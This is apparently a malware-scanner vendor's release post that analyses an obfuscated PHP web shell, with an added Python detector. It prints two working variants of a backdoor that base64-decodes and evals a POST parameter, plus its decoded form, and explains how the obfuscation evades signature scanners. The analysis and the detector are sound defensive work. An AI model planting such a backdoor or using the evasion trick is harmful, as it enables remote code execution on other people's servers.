Today we released the new version 1.24.13 of ISPProtect malware scanner.

It includes new malware signatures and new heuristics for dynamic malware code. Below we show a new type of malware that is hard for static code scanners (such as the hex signatures used by virus scanners) to recognize.

<?php 
$code1="aWYoaXNzZXQoJF9QT1NUWyJxaXBqIl0pKXtAZXZhbCgkX1BPU1RbInFpcGoiXSk7ZXhpdDt9";
$sp9="st"."r_"."r"."ep"."la"."ce";
$nv7 = $sp9("vc","","cvcrvcevcavctvce_fvcuncvctivconvc");
$bd0=$sp9("vb","","bvbasvbe6vb4_dvbecvbovbde");
$ex5 = $nv7('', $bd0($code1));
$ex5();

In fact, the above code is nothing other than an obfuscated version of the following:

<?php
if(isset($_POST["qipj"])){@eval($_POST["qipj"]);exit;}

As the key name (here “qipj”) can be any string, the base64-encoded string in the visible source code (aWYoaXNzZXQoJF9QT1NUWyJxaXBqIl0pKXtAZXZhbCgkX1BPU1RbInFpcGoiXSk7ZXhpdDt9) is dynamic, and creating a hex signature for it does not make any sense.
In addition, the replacement strings (here “vc” and “vb”) can also be dynamic.

So the malware creator could, without effort, change the code to the following, which does exactly the same:

<?php
$c01de1="aWYoIGlzc2V0KCRfUE9TVFsiYXZjcyJdKSl7QGV2YWwoJF9QT1NUWyJhdmNzIl0pO2V4aXQ7IH0=";
$sp2="s"."tr".""."_"."rep".""."l"."a"."c".""."e"."";
$avc7 = $sp2("234","","c234r234e234a234t234e_f234un234cti234on234");
$bd0=$sp2("567","","b567as567e65674_d567ec567o567de");
$v315 = $avc7('', $bd0($c01de1));
$v315();

As you can see, each line of the code has changed without affecting the result.
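A check that does not depend on the changing bytes, as an added example (not ISPProtect's code and not part of the original post): it folds the string concatenations, emulates the literal str_replace calls, and reports function names that only exist after that step, plus base64 literals that decode to an eval call. The SENSITIVE list, the finding labels and the benign input are assumptions made for this sketch.

```python
import base64
import binascii
import re

# Names that should never be assembled from fragments at runtime (assumed list).
SENSITIVE = {"create_function", "base64_decode", "eval", "assert", "system"}
CONCAT = re.compile(r'"([^"]*)"\s*\.\s*"([^"]*)"')
ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')
CALL3 = re.compile(r'\$(\w+)\s*=\s*\$(\w+)\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)\s*;')
B64 = re.compile(r'"([A-Za-z0-9+/]{24,}={0,2})"')

# Assignment lines copied from the two samples above; invocation lines left out.
SAMPLE_A = r'''$code1="aWYoaXNzZXQoJF9QT1NUWyJxaXBqIl0pKXtAZXZhbCgkX1BPU1RbInFpcGoiXSk7ZXhpdDt9";
$sp9="st"."r_"."r"."ep"."la"."ce";
$nv7 = $sp9("vc","","cvcrvcevcavctvce_fvcuncvctivconvc");
$bd0=$sp9("vb","","bvbasvbe6vb4_dvbecvbovbde");'''
SAMPLE_B = r'''$c01de1="aWYoIGlzc2V0KCRfUE9TVFsiYXZjcyJdKSl7QGV2YWwoJF9QT1NUWyJhdmNzIl0pO2V4aXQ7IH0=";
$sp2="s"."tr".""."_"."rep".""."l"."a"."c".""."e"."";
$avc7 = $sp2("234","","c234r234e234a234t234e_f234un234cti234on234");
$bd0=$sp2("567","","b567as567e65674_d567ec567o567de");'''
# Constructed benign input: ordinary use of str_replace must not be flagged.
BENIGN = r'''$sep="-"."_";
$slug = str_replace(" ", "-", $title);'''


def scan(php_source):
    """Return sorted findings: runtime-assembled function names, encoded eval."""
    src = php_source
    while CONCAT.search(src):                  # fold "st"."r_" into "str_"
        src = CONCAT.sub(lambda m: '"%s%s"' % m.groups(), src)
    values = dict(ASSIGN.findall(src))         # $var -> literal string value
    for lhs, fn, search, repl, subject in CALL3.findall(src):
        if values.get(fn) == "str_replace":    # emulate the all-literal call
            values[lhs] = subject.replace(search, repl)
    findings = {"hidden-function:" + v for v in values.values()
                if v in SENSITIVE and v not in php_source}
    for blob in B64.findall(src):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue
        if re.search(r"\beval\s*\(", text):
            findings.add("encoded-eval")
    return sorted(findings)
```

Both variants produce the same three findings even though no line of one matches the other, while the benign file produces none.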
